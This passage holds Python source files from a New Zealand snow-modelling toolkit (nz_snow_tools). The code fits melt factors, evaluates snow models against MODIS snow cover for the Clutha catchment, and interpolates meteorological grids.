#plt.show()
print(
np.sum(qm_wo_sw_prc[qm>0])/sw_net.shape,# average positive melt energy from temp dep fluxes
np.sum(sw_net[qm>0])/sw_net.shape, # average melt energy from sw_net
np.sum(qprc[qm>0])/sw_net.shape # average melt energy from precipitation
)
qm_wo_sw_prc[qm_wo_sw_prc<0] = 0 # set all negative melt energy to zero
# find optimal parameters for ea and ta
from scipy.optimize import curve_fit
def f(x, A): # this is your 'straight line' y=f(x)
return A*x
# sum melt energy from ea and ta
# melt factor was 0.025 mm w.e. per hour per hPa
ea_pos = ea-6.112
ea_pos[ea_pos<0] = 0
A = curve_fit(f,ea_pos, qm_wo_sw_prc)[0] # find optimal ea_q factor = 41.9
np.median(qm_wo_sw_prc[qm_wo_sw_prc>0]/ea_pos[qm_wo_sw_prc>0]) # median Wm^-2 per K = 41.7
ea_q = ea_pos * 42
# Wm^-2 per K (melt rate of 0.05 mm w.e. per hour per K = 4.6 Wm^-2 per K)
ta_pos = ta - 0.
ta_pos[ta_pos<0] = 0
A = curve_fit(f,ta_pos, qm_wo_sw_prc)[0]# find optimal ta_q factor = 8.7
np.median(qm_wo_sw_prc[qm_wo_sw_prc>0]/ta_pos[qm_wo_sw_prc>0]) # median Wm^-2 per K = 14.7
ta_q = ta_pos * 8.7
#K * / (mm w.e. W) *
print(
np.sum(qm_wo_sw_prc[qm>0])/sw_net.shape,# average positive melt energy from temp dep fluxes
np.sum(ea_q)/sw_net.shape, # average calculated melt energy from temp dep fluxes using ea
np.sum(ta_q)/sw_net.shape, # average calculated melt energy from temp dep fluxes using ta
np.sum(sw_net[qm>0])/sw_net.shape, # average melt energy from sw_net
np.sum(sw_net[np.logical_and(qm>0,ta<0)])/sw_net.shape, # average melt energy from sw_net when temperature below 0
np.sum(sw_net[np.logical_and(qm>0,ta>0)])/sw_net.shape, # average melt energy from sw_net when temperature above 0
np.sum(qprc[qm>0])/sw_net.shape # average melt energy from precipitation
)
plt.figure()
plt.hexbin(qm_wo_sw_prc[np.logical_and(ta_q>0,qm_wo_sw_prc>0)],ta_q[np.logical_and(ta_q>0,qm_wo_sw_prc>0)])
plt.plot(range(300),range(300),'b--')
plt.ylabel('mod'),plt.xlabel('obs'),plt.title('ta_q vs qm_wo_sw_prc')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ta_q.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[np.logical_and(ea_q>0,qm_wo_sw_prc>0)],ea_q[np.logical_and(ea_q>0,qm_wo_sw_prc>0)])
plt.ylabel('mod'),plt.xlabel('obs'),plt.title('ea_q vs qm_wo_sw_prc')
plt.plot(range(300),range(300),'b--')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ea_q.png')
plt.figure()
plt.hist(qm_wo_sw_prc[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/ta_pos[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)],20)
plt.xlabel('ta_q_factor (W m-2 K-1)')
plt.savefig(r'D:\Snow project\Oct2018 Results\ta_q_factor_hist.png')
#plt.show()
print(
rmsd(qm_wo_sw_prc,ta_q),
rmsd(qm_wo_sw_prc,ea_q)
)
es = 6.1121 * np.exp(17.502*ta/(240.97+ta))
rh = (ea/es) * 100
plt.scatter(rh[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]*ws[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/10.,qm_wo_sw_prc[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/ta_pos[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)],3)
plt.scatter(rh[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)],qm_wo_sw_prc[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/ta_pos[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)])
plt.scatter(ql,qm_wo_sw_prc-ta_q)
plt.scatter(ta,qm_wo_sw_prc-ta_q)
```
#### File: nz_snow_tools/eval/catchment_evaluation.py
```python
from __future__ import division
import netCDF4 as nc
import datetime as dt
import numpy as np
import pickle
from nz_snow_tools.snow.clark2009_snow_model import snow_main_simple
from nz_snow_tools.util.utils import convert_date_hydro_DOY, create_mask_from_shpfile, trim_lat_lon_bounds, setup_nztm_dem, make_regular_timeseries, \
trim_data_to_mask
def run_clark2009(catchment, output_dem, hydro_year_to_take, met_inp_folder, catchment_shp_folder):
"""
wrapper to call the clark 2009 snow model for given area
:param catchment: string giving catchment area to run model on
:param output_dem: string identifying the grid to run model on
:param hydro_year_to_take: integer specifying the hydrological year to run model over. 2001 = 1/4/2000 to 31/3/2001
:return: st_swe, st_melt, st_acc, out_dt, mask. daily grids of SWE at day's end, total melt and accumulation over the previous day, and datetimes of ouput
"""
print('loading met data')
data_id = '{}_{}'.format(catchment, output_dem)
inp_met = nc.Dataset(met_inp_folder + '/met_inp_{}_hy{}.nc'.format(data_id, hydro_year_to_take), 'r')
inp_dt = nc.num2date(inp_met.variables['time'][:], inp_met.variables['time'].units)
inp_doy = convert_date_hydro_DOY(inp_dt)
inp_hourdec = [datt.hour for datt in inp_dt]
inp_ta = inp_met.variables['temperature'][:]
inp_precip = inp_met.variables['precipitation'][:]
print('met data loaded')
mask = create_mask_from_shpfile(inp_met.variables['lat'][:], inp_met.variables['lon'][:], catchment_shp_folder + '/{}.shp'.format(catchment))
# TODO: think about masking input data to speed up
print('starting snow model')
# start with no snow.
# call main function once hourly/sub-hourly temp and precip data available.
st_swe, st_melt, st_acc = snow_main_simple(inp_ta, inp_precip, inp_doy, inp_hourdec, dtstep=3600)
out_dt = np.asarray(make_regular_timeseries(inp_dt[0], inp_dt[-1] + dt.timedelta(days=1), 86400))
print('snow model finished')
# mask out values outside of catchment
st_swe[:, mask == False] = np.nan
st_melt[:, mask == False] = np.nan
st_acc[:, mask == False] = np.nan
return st_swe, st_melt, st_acc, out_dt, mask
def load_dsc_snow_output(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder, dsc_snow_dem_folder):
"""
load output from dsc_snow model previously run from linux VM
:param catchment: string giving catchment area to run model on
:param output_dem: string identifying the grid to run model on
:param hydro_year_to_take: integer specifying the hydrological year to run model over. 2001 = 1/4/2000 to 31/3/2001
:return: st_swe, st_melt, st_acc, out_dt. daily grids of SWE at day's end, total melt and accumulation over the previous day, and datetimes of ouput
"""
data_id = '{}_{}'.format(catchment, output_dem)
dsc_snow_output = nc.Dataset(dsc_snow_output_folder + '/{}_hy{}.nc'.format(data_id, hydro_year_to_take), 'r')
out_dt = nc.num2date(dsc_snow_output.variables['time'][:], dsc_snow_output.variables['time'].units)
st_swe = dsc_snow_output.variables['snow_water_equivalent'][:]
st_melt_total = dsc_snow_output.variables['ablation_total'][:]
st_acc_total = dsc_snow_output.variables['accumulation_total'][:]
# convert to daily sums
st_melt = np.concatenate((st_melt_total[:1, :], np.diff(st_melt_total, axis=0)))
st_acc = np.concatenate((st_melt_total[:1, :], np.diff(st_acc_total, axis=0)))
topo_file = nc.Dataset(dsc_snow_dem_folder + '/{}_topo_no_ice.nc'.format(data_id), 'r')
mask = topo_file.variables['catchment'][:].astype('int')
mask = mask != 0 # convert to boolean
# mask out values outside of catchment
st_swe[:, mask == False] = np.nan
st_melt[:, mask == False] = np.nan
st_acc[:, mask == False] = np.nan
return st_swe * 1e3, st_melt * 1e3, st_acc * 1e3, out_dt, mask # convert to mm w.e.
def load_subset_modis(catchment, output_dem, hydro_year_to_take, modis_folder, dem_folder, modis_dem, mask_folder, catchment_shp_folder):
"""
load modis data from file and cut to catchment of interest
:param catchment: string giving catchment area to run model on
:param output_dem: string identifying the grid to run model on
:param hydro_year_to_take: integer specifying the hydrological year to run model over. 2001 = 1/4/2000 to 31/3/2001
:return: trimmed_fsca, modis_dt, trimmed_mask. The data, datetimes and catchment mask
"""
# load a file
nc_file = nc.Dataset(modis_folder + '/fsca_{}hy_comp9.nc'.format(hydro_year_to_take))
fsca = nc_file.variables['fsca'][:].astype('float32')
# read date and convert into hydrological year
modis_dt = nc.num2date(nc_file.variables['time'][:], nc_file.variables['time'].units)
# filter out dud values
fsca[fsca > 100] = np.nan
# trim to only the catchment desired
mask, trimmed_mask = load_mask_modis(catchment, output_dem, mask_folder, dem_folder=dem_folder, modis_dem=modis_dem)
# trimmed_fsca = trim_data_bounds(mask, lat_array, lon_array, fsca[183].copy(), y_centres, x_centres)
trimmed_fsca = trim_data_to_mask(fsca, mask)
# mask out values outside of catchment
trimmed_fsca[:, trimmed_mask == 0] = np.nan
return trimmed_fsca, modis_dt, trimmed_mask
def load_mask_modis(catchment, output_dem, mask_folder, dem_folder, modis_dem):
'''
load mask and trimmed mask of catchment for modis clutha domain
'''
if modis_dem == 'clutha_dem_250m':
# dem_file = dem_folder + modis_dem + '.tif'
_, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(None)
if modis_dem == 'si_dem_250m':
# dem_file = dem_folder + modis_dem + '.tif'
_, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(None, extent_w=1.08e6, extent_e=1.72e6, extent_n=5.52e6, extent_s=4.82e6,
resolution=250)
if modis_dem == 'modis_si_dem_250m':
# dem_file = dem_folder + modis_dem + '.tif'
_, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(None, extent_w=1.085e6, extent_e=1.72e6, extent_n=5.52e6, extent_s=4.82e6,
resolution=250)
# # Get the masks for the individual regions of interest
mask = np.load(mask_folder + '/{}_{}.npy'.format(catchment, modis_dem))
_, _, trimmed_mask, _, _ = trim_lat_lon_bounds(mask, lat_array, lon_array, mask.copy(), y_centres, x_centres)
return mask, trimmed_mask
def load_dsc_snow_output_python_otf(catchment, output_dem, year_to_take, dsc_snow_output_folder):
dsc_snow_output = nc.Dataset(dsc_snow_output_folder + '/snow_out_{}_{}_{}.nc'.format(catchment, output_dem, year_to_take - 1), 'r')
out_dt = nc.num2date(dsc_snow_output.variables['time'][:], dsc_snow_output.variables['time'].units)
st_swe = dsc_snow_output.variables['swe'][:]
st_melt = dsc_snow_output.variables['melt'][:]
st_acc = dsc_snow_output.variables['acc'][:]
return st_swe, st_melt, st_acc, out_dt
if __name__ == '__main__':
which_model = 'dsc_snow' # string identifying the model to be run. options include 'clark2009', 'dsc_snow', or 'all' # future will include 'fsm'
clark2009run = True # boolean specifying if the run already exists
dsc_snow_opt = 'python' # string identifying which version of the dsc snow model to use output from 'python' or 'fortran'
dsc_snow_opt2 = 'netCDF' # string identifying which version of output from python model 'netCDF' of 'pickle'
catchment = 'Clutha'
output_dem = 'nztm250m' # identifier for output dem
hydro_years_to_take = range(2001, 2016 + 1) # [2013 + 1] # range(2001, 2013 + 1)
modis_sc_threshold = 50 # value of fsca (in percent) that is counted as being snow covered
model_swe_sc_threshold = 5 # threshold for treating a grid cell as snow covered
dsc_snow_output_folder = 'T:/DSC-Snow/nz_snow_runs/baseline_clutha2'
clark2009_output_folder = 'T:/DSC-Snow/nz_snow_runs/baseline_clutha1'
mask_folder = 'T:/DSC-Snow/Masks'
catchment_shp_folder = 'Z:/GIS_DATA/Hydrology/Catchments'
modis_folder = 'Z:/MODIS_snow/MODIS_NetCDF'
dem_folder = 'Z:/GIS_DATA/Topography/DEM_NZSOS/'
modis_dem = 'clutha_dem_250m'
met_inp_folder = 'T:/DSC-Snow/input_data_hourly'
dsc_snow_dem_folder = 'P:/Projects/DSC-Snow/runs/input_DEM'
output_folder = 'P:/Projects/DSC-Snow/nz_snow_runs/baseline_clutha2'
# set up lists
ann_ts_av_sca_m = []
ann_ts_av_sca_thres_m = []
ann_hydro_days_m = []
ann_dt_m = []
ann_scd_m = []
ann_ts_av_sca = []
ann_ts_av_swe = []
# ann_ts_av_melt = []
# ann_ts_av_acc = []
ann_hydro_days = []
ann_dt = []
ann_scd = []
ann_ts_av_sca2 = []
ann_ts_av_swe2 = []
# ann_ts_av_melt2 = []
# ann_ts_av_acc2 = []
ann_hydro_days2 = []
ann_dt2 = []
ann_scd2 = []
configs = []
for hydro_year_to_take in hydro_years_to_take:
print('loading modis data HY {}'.format(hydro_year_to_take))
# load modis data for evaluation
modis_fsca, modis_dt, modis_mask = load_subset_modis(catchment, output_dem, hydro_year_to_take, modis_folder, dem_folder, modis_dem, mask_folder,
catchment_shp_folder)
modis_hydro_days = convert_date_hydro_DOY(modis_dt)
modis_sc = modis_fsca >= modis_sc_threshold
# print('calculating basin average sca')
# modis
num_modis_gridpoints = np.sum(modis_mask)
ba_modis_sca = []
ba_modis_sca_thres = []
for i in range(modis_fsca.shape[0]):
ba_modis_sca.append(np.nanmean(modis_fsca[i, modis_mask]) / 100.0)
ba_modis_sca_thres.append(np.nansum(modis_sc[i, modis_mask]).astype('d') / num_modis_gridpoints)
# print('adding to annual series')
ann_ts_av_sca_m.append(np.asarray(ba_modis_sca))
ann_ts_av_sca_thres_m.append(np.asarray(ba_modis_sca_thres))
# print('calc snow cover duration')
modis_scd = np.sum(modis_sc, axis=0)
modis_scd[modis_mask == 0] = -1
# add to annual series
ann_scd_m.append(modis_scd)
ann_hydro_days_m.append(modis_hydro_days)
ann_dt_m.append(modis_dt)
modis_fsca = None
modis_dt = None
modis_mask = None
modis_sc = None
modis_scd = None
if which_model == 'clark2009' or which_model == 'all':
print('loading clark2009 model data HY {}'.format(hydro_year_to_take))
if clark2009run == False:
# run model and return timeseries of daily swe, acc and melt.
st_swe, st_melt, st_acc, out_dt, mask = run_clark2009(catchment, output_dem, hydro_year_to_take, met_inp_folder, catchment_shp_folder)
pickle.dump([st_swe, st_melt, st_acc, out_dt, mask], open(clark2009_output_folder + '/{}_{}_hy{}.pkl'.format(catchment, output_dem,
hydro_year_to_take), 'wb'), -1)
elif clark2009run == True:
# load previously run simulations from pickle file
st_snow = pickle.load(open(clark2009_output_folder + '/{}_{}_hy{}_clark2009.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
st_swe = st_snow[0]
st_melt = st_snow[1]
st_acc = st_snow[2]
out_dt = st_snow[3]
mask = st_snow[4]
config1 = st_snow[5]
configs.append(config1)
# compute timeseries of basin average sca
num_gridpoints = np.sum(mask) # st_swe.shape[1] * st_swe.shape[2]
ba_swe = []
ba_sca = []
# ba_melt = []
# ba_acc = []
for i in range(st_swe.shape[0]):
ba_swe.append(np.nanmean(st_swe[i, mask])) # some points don't have input data, so are nan
ba_sca.append(np.nansum(st_swe[i, mask] > model_swe_sc_threshold).astype('d') / num_gridpoints)
# ba_melt.append(np.mean(st_melt[i, mask.astype('int')]))
# ba_acc.append(np.mean(st_acc[i, mask.astype('int')]))
# add to annual series
ann_ts_av_sca.append(np.asarray(ba_sca))
ann_ts_av_swe.append(np.asarray(ba_swe))
# ann_ts_av_melt.append(np.asarray(ba_melt))
# ann_ts_av_acc.append(np.asarray(ba_acc))
ann_hydro_days.append(convert_date_hydro_DOY(out_dt))
ann_dt.append(out_dt)
# calculate snow cover duration
st_sc = st_swe > model_swe_sc_threshold
mod1_scd = np.sum(st_sc, axis=0)
mod1_scd[mask == 0] = -999
ann_scd.append(mod1_scd)
# clear arrays
st_swe = None
st_melt = None
st_acc = None
out_dt = None
mod1_scd = None
mask = None
st_sc = None
st_snow = None
if which_model == 'dsc_snow' or which_model == 'all':
print('loading dsc_snow model data HY {}'.format(hydro_year_to_take))
if dsc_snow_opt == 'fortran':
# load previously run simulations from netCDF
st_swe, st_melt, st_acc, out_dt, mask = load_dsc_snow_output(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder,
dsc_snow_dem_folder)
elif dsc_snow_opt == 'python':
if dsc_snow_opt2 == 'netCDF':
st_swe, st_melt, st_acc, out_dt = load_dsc_snow_output_python_otf(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder)
# load mask
dem = 'si_dem_250m'
dem_folder = 'Z:/GIS_DATA/Topography/DEM_NZSOS/'
dem_file = dem_folder + dem + '.tif'
nztm_dem, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(dem_file)
mask = np.load(mask_folder + '/{}_{}.npy'.format(catchment, dem))
_, _, trimmed_mask, _, _ = trim_lat_lon_bounds(mask, lat_array, lon_array, mask.copy(), y_centres, x_centres)
mask = trimmed_mask
elif dsc_snow_opt2 == 'pickle':
# load previously run simulations from pickle file
st_snow = pickle.load(open(dsc_snow_output_folder + '/{}_{}_hy{}_dsc_snow.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
st_swe = st_snow[0]
st_melt = st_snow[1]
st_acc = st_snow[2]
out_dt = st_snow[3]
mask = st_snow[4]
config2 = st_snow[5]
configs.append(config2)
# print('calculating basin average sca')
num_gridpoints2 = np.sum(mask)
ba_swe2 = []
ba_sca2 = []
for i in range(st_swe.shape[0]):
ba_swe2.append(np.nanmean(st_swe[i, mask]))
ba_sca2.append(np.nansum(st_swe[i, mask] > model_swe_sc_threshold).astype('d') / num_gridpoints2)
# print('adding to annual series')
# add to annual timeseries
if which_model == 'all':
ann_ts_av_sca2.append(np.asarray(ba_sca2))
ann_ts_av_swe2.append(np.asarray(ba_swe2))
# ann_ts_av_melt.append(np.asarray(ba_melt))
# ann_ts_av_acc.append(np.asarray(ba_acc))
ann_hydro_days2.append(convert_date_hydro_DOY(out_dt))
ann_dt2.append(out_dt)
elif which_model == 'dsc_snow':
ann_ts_av_sca.append(np.asarray(ba_sca2))
ann_ts_av_swe.append(np.asarray(ba_swe2))
# ann_ts_av_melt.append(np.asarray(ba_melt))
# ann_ts_av_acc.append(np.asarray(ba_acc))
ann_hydro_days.append(convert_date_hydro_DOY(out_dt))
ann_dt.append(out_dt)
# print('calc snow cover duration')
st_sc = st_swe > model_swe_sc_threshold
mod_scd = np.sum(st_sc, axis=0)
mod_scd[mask == 0] = -999
if which_model == 'all':
ann_scd2.append(mod_scd)
elif which_model == 'dsc_snow':
ann_scd.append(mod_scd)
# clear arrays
st_snow = None
st_swe = None
st_melt = None
st_acc = None
out_dt = None
mod_scd = None
mask = None
st_sc = None
#
# if which_model == 'all':
# if clark2009run == False:
# # run model and return timeseries of daily swe, acc and melt.
# st_swe, st_melt, st_acc, out_dt, mask = run_clark2009(catchment, output_dem, hydro_year_to_take, met_inp_folder, catchment_shp_folder)
# elif clark2009run == True:
# # load previously run simulations from pickle file
# st_snow = pickle.load(open(clark2009_output_folder + '/{}_{}_hy{}_clark2009.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
# st_swe = st_snow[0]
# st_melt = st_snow[1]
# st_acc = st_snow[2]
# out_dt = st_snow[3]
# mask = st_snow[4]
#
# # load previously run simulations from netCDF or pickle file
# if dsc_snow_opt == 'fortran':
# st_swe2, st_melt2, st_acc2, out_dt2, mask2 = load_dsc_snow_output(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder,
# dsc_snow_dem_folder)
# elif dsc_snow_opt == 'python':
# st_snow2 = pickle.load(open(dsc_snow_output_folder + '/{}_{}_hy{}_dsc_snow.pkl'.format(catchment, output_dem, hydro_year_to_take), 'rb'))
# st_swe2 = st_snow2[0]
# st_melt2 = st_snow2[1]
# st_acc2 = st_snow2[2]
# out_dt2 = st_snow2[3]
# mask2 = st_snow2[4]
ann = [ann_ts_av_sca_m, ann_hydro_days_m, ann_dt_m, ann_scd_m, ann_ts_av_sca, ann_ts_av_swe, ann_hydro_days, ann_dt, ann_scd, ann_ts_av_sca2,
ann_ts_av_swe2, ann_hydro_days2, ann_dt2, ann_scd2, ann_ts_av_sca_thres_m, configs]
pickle.dump(ann, open(output_folder + '/summary_{}_{}_thres{}_swe{}.pkl'.format(catchment, output_dem, modis_sc_threshold, model_swe_sc_threshold), 'wb'),
-1)
```
#### File: nz_snow_tools/eval/gridded_evaluation_annual.py
```python
from __future__ import division
import matplotlib.pylab as plt
from nz_snow_tools.eval.catchment_evaluation import *
from nz_snow_tools.eval.catchment_evaluation_annual import load_dsc_snow_output_annual, load_subset_modis_annual
from nz_snow_tools.util.utils import resample_to_fsca, nash_sut, mean_bias, rmsd, mean_absolute_error
def plot_point(i,j,name,year):
plt.figure()
plt.plot(np.convolve(model_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same'))
plt.plot(np.convolve(modis_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same'))
plt.ylabel('fsca (%)')
plt.xlabel('day of year')
plt.title(name)
plt.savefig('P:/Projects/DSC-Snow/runs/output/clutha_nztm250m_erebus/plots/timeseries/timeseries_{}_{}_{}_{}.png'.format(name,year,smooth_period,run_id))
plt.close()
if __name__ == '__main__':
rl = 4 # resample length (i.e. how many grid cells in each direction to resample.
smooth_period = 10 # number of days to smooth model data
origin = 'topleft'
catchment = 'Clutha' # string identifying catchment modelled
output_dem = 'nztm250m' # identifier for output dem
years_to_take = range(2000, 2016 + 1) # range(2016, 2016 + 1) # [2013 + 1] # range(2001, 2013 + 1)
# modis_sc_threshold = 50 # value of fsca (in percent) that is counted as being snow covered
model_swe_sc_threshold = 20 # threshold for treating a grid cell as snow covered (mm w.e)
dsc_snow_output_folder = 'D:/DSC-Snow/runs/output/clutha_nztm250m_erebus'
mask_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Temp/DSC-Snow/Masks'
catchment_shp_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Data/GIS_DATA/Hydrology/Catchments'
modis_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Data/MODIS_snow/NSDI_SI_cloudfilled'
dem_folder = 'C:/Users/conwayjp/OneDrive - NIWA/Data/GIS_DATA/Topography/DEM_NZSOS/'
modis_dem = 'modis_si_dem_250m'
met_inp_folder = 'D:/DSC-Snow/input_data_hourly'
dsc_snow_dem_folder = 'C:/Users/conwayjp/OneDrive - NIWA/projects/DSC Snow/Projects-DSC-Snow/runs/input_DEM'
output_folder = 'C:/Users/conwayjp/OneDrive - NIWA/projects/DSC Snow/Projects-DSC-Snow/runs/output/clutha_nztm250m_erebus'
for year_to_take in years_to_take:
print('loading modis data {}'.format(year_to_take))
# load modis data for evaluation
modis_fsca, modis_dt, modis_mask = load_subset_modis_annual(catchment, output_dem, year_to_take, modis_folder, dem_folder, modis_dem, mask_folder,
catchment_shp_folder)
# set up output array
nt = modis_fsca.shape[0]
ny = modis_fsca.shape[1]
nx = modis_fsca.shape[2]
ny_out = ny // rl # integer divide to ensure fits
nx_out = nx // rl
modis_fsca_rs = np.zeros((nt, ny_out, nx_out))
for i in range(nt):
modis_sub = modis_fsca[i,]
fsca_rs = resample_to_fsca(modis_sub, rl=rl)
modis_fsca_rs[i] = fsca_rs
# load model data
for tempchange in [-2, 0]:
for precipchange in [20, 50, 100]:
# if tempchange == 0 and precipchange in [50,100]:
# pass
# else:
s_ns = []
s_bias = []
s_rmse = []
s_mae = []
s_obs = []
s_mod = []
run_id = 'norton_5_t{}_p{}_topleft'.format(tempchange,precipchange) # string identifying fortran dsc_snow run. everything after the year
# recipie
# read in modis and model data for one year
# average to large spatial scale
# compare timeseries of fsca at each point
# store statistics - for each point for each year dims = [year,y,x]
print('loading dsc_snow model data {}'.format(year_to_take))
# load previously run simulations from netCDF
st_swe, _, _, out_dt, mask = load_dsc_snow_output_annual(catchment, output_dem, year_to_take, dsc_snow_output_folder,
dsc_snow_dem_folder, run_id, origin=origin)
if year_to_take == 2000:
# cut so that first day corresponds to first MODIS obs on 24th Feb i.e. 2000-02-25 00:00:00
st_swe = st_swe[54:, ]
# st_melt = st_melt[54:, ]
# st_acc = st_acc[54:, ]
out_dt = out_dt[54:]
st_sc = np.zeros(st_swe.shape, dtype=np.float32)
st_sc[st_swe > model_swe_sc_threshold] = 100
st_sc[:, mask == False] = np.nan
model_fsca_rs = np.zeros((nt, ny_out, nx_out))
for i in range(nt):
model_sub = st_sc[i,]
fsca_rs = resample_to_fsca(model_sub, rl=rl)
model_fsca_rs[i] = fsca_rs
# plt.plot(np.nanmean(model_fsca_rs, axis=(1, 2)))
#
# plt.figure()
# plt.imshow(np.mean(modis_fsca_rs, axis=0),origin=0)
# plt.figure()
# plt.imshow(np.mean(model_fsca_rs, axis=0),origin=0)
ns_array = np.zeros((ny_out, nx_out))
mbd_array = np.zeros((ny_out, nx_out))
rmsd_array = np.zeros((ny_out, nx_out))
mae_array = np.zeros((ny_out, nx_out))
for i in range(ny_out):
for j in range(nx_out):
obs = np.convolve(modis_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same')
mod = np.convolve(model_fsca_rs[:, i, j], np.ones((smooth_period,)) / smooth_period, mode='same')
ns_array[i, j] = nash_sut(mod, obs)
mbd_array[i, j] = mean_bias(mod, obs)
rmsd_array[i, j] = rmsd(mod, obs)
mae_array[i, j] = mean_absolute_error(mod, obs)
modis_mean = np.mean(modis_fsca_rs, axis=0)
model_mean = np.mean(model_fsca_rs, axis=0)
s_ns.append(ns_array)
s_bias.append(mbd_array)
s_rmse.append(rmsd_array)
s_mae.append(mae_array)
s_obs.append(modis_mean)
s_mod.append(model_mean)
for i,j,name in zip([161,147,127,107,186,125],[83,102,59,88,21,34],['Pisa','Dunstan','Hector','<NAME>','Earnslaw','Lochy']):
plot_point(i,j,name,year_to_take)
ann = [s_obs, s_mod, s_ns, s_bias, s_rmse, s_mae]
pickle.dump(ann, open(
output_folder + '/resample_fit_{}_swe{}_{}_rs{}_smooth{}_{}.pkl'.format(catchment, model_swe_sc_threshold, run_id, rl,smooth_period,year_to_take),
'wb'), -1)
st_swe, st_sc = None, None
# reset variables to save space
modis_fsca = None
```
#### File: nz_snow_tools/met/interp_rcm_diff.py
```python
from __future__ import division
import os
#os.environ['PROJ_LIB'] = '/home/jared/anaconda/envs/nz_snow_tools/share/proj'
import datetime as dt
import netCDF4 as nc
import numpy as np
import pickle
#from bs.core import source, env
# from nz_snow_tools.util import convert_projection
import matplotlib.pylab as plt
import os
os.environ['PROJ_LIB']=r'C:\miniconda\envs\nz_snow27\Library\share'
import mpl_toolkits.basemap as basemap
from scipy import interpolate
from nz_snow_tools.util.utils import process_precip, process_temp, create_mask_from_shpfile, make_regular_timeseries, calc_toa, trim_lat_lon_bounds, \
setup_nztm_dem
from nz_snow_tools.util.write_fsca_to_netcdf import write_nztm_grids_to_netcdf, setup_nztm_grid_netcdf
# def get_elevation_data(ravel_idxs):
# ds = nc.Dataset(env.data('/RCMData/Version6/RCP2.6/BCC-CSM1.1/MaxTempCorr_VCSN_BCC-CSM1.1_2006-2010_RCP2.6.nc'))
# return ds.variables['elevation'][:].ravel()[ravel_idxs]
#
#
# def get_vscn_elevation_data(ravel_idxs):
# ds = nc.Dataset(env.data('/RCMData/Version6/RCP2.6/BCC-CSM1.1/MaxTempCorr_VCSN_BCC-CSM1.1_2006-2010_RCP2.6.nc'))
# return np.flipud(ds.variables['elevation'][:]).ravel()[ravel_idxs]
#
# def get_ravel_idxs(mask):
# existing_landpoints = np.load(get_subset_landpoints_fname())
# masked_landpoints = ravel.calc_ravel_idxs(mask, False)
#
# # Only include the points in the subsetted data
# masked_landpoints = np.array(filter(lambda x: x in existing_landpoints, masked_landpoints))
#
# return masked_landpoints
#
#
# def get_masks():
# shp_file = shapefile.Reader(mask_shpfile)
# res = []
# # first field is id and the second is the name
# for idx, sr in enumerate(shp_file.shapeRecords()):
# mask = create_mask_from_shpfile(VCSN_file.latitudes(), VCSN_file.longitudes(), mask_shpfile, idx)
# res.append((sr.record[1], mask))
# return res
#
#
# def subset_mask(mask, data):
# """
# Obtain the subset defined by the mask
#
# Since the data array is already ravelled, it cannot be masked easily. Instead the overlapping ravelled indexs must be calculated and
# then extracted
# :param mask:
# :param data:
# :return: The subsetted data
# """
# existing_landpoints = np.load(get_subset_landpoints_fname())
# masked_landpoints = get_ravel_idxs(mask)
#
# # Find the overlapping points
# overlap = np.array([idx in masked_landpoints for idx in existing_landpoints])
#
# return data[:, overlap]
def interpolate_met(in_dat, var, in_lons, in_lats, in_elev, out_lons, out_lats, out_elev, lapse=-0.005, single_dt=False):
"""
interpolate met data for one timestep from coarse (vcsn) grid onto higher-resolution grid using bilinear interpolation.
Air temperatures are first lapsed to sea level using default lapse rate of 0.005 K per m, interpolated, then lapsed to elevation of new grid
:param in_dat: 3D array with data to be interpolated. has matrix [i,j] coordinates i.e. dimensions [time, in_lats, in_lons]
:param var: name of variable to be interpolated. if 't_max', or 't_min' will lapse to sea level before interpolation
:param in_lons: 1D or 2D array containing longitudes of input data
:param in_lats: 1D or 2Darray containing latitudes of input data
:param in_elev: 2D array containing elevation of input data, dimesions [in_lats, in_lons] or same as in_lons
:param out_lons: 1D array containing longitudes of output data
:param out_lats: 1D array containing latitudes of output data
:param out_elev: 2D array containing elevation of output data, dimension [out_lats, out_lons]
:param lapse: lapse rate used to reduce data to sea level before interpolation
:return: out_dat: 3D array with interpolated data has dimensions [time, out_lats, out_lons]
"""
# X, Y = np.meshgrid(vcsn_lons, vcsn_lats)
if out_lons.ndim == 1 and out_lats.ndim == 1:
# y_array, x_array = np.meshgrid(y_centres, x_centres, indexing='ij')
YI, XI, = np.meshgrid(out_lats, out_lons,
indexing='ij') # the input grid must have i,j ordering with y(lats) being the first dimension.
num_out_lats = len(out_lats)
num_out_lons = len(out_lons)
else:
num_out_lats = out_lons.shape[0]
num_out_lons = out_lons.shape[1]
XI = out_lons
YI = out_lats
if single_dt == False:
out_dat = np.empty([in_dat.shape[0], num_out_lats, num_out_lons], dtype=np.float32) * np.nan
for i in range(in_dat.shape[0]):
in_dat1 = in_dat[i, :, :] * 1.0
if type(in_dat) == np.ma.core.MaskedArray:
in_dat1.data[in_dat1.mask] = np.nan
if var in ['tmax', 'tmin']: # lapse to sea level
in_t_offset = in_elev * lapse
in_dat1 = in_dat1 - in_t_offset
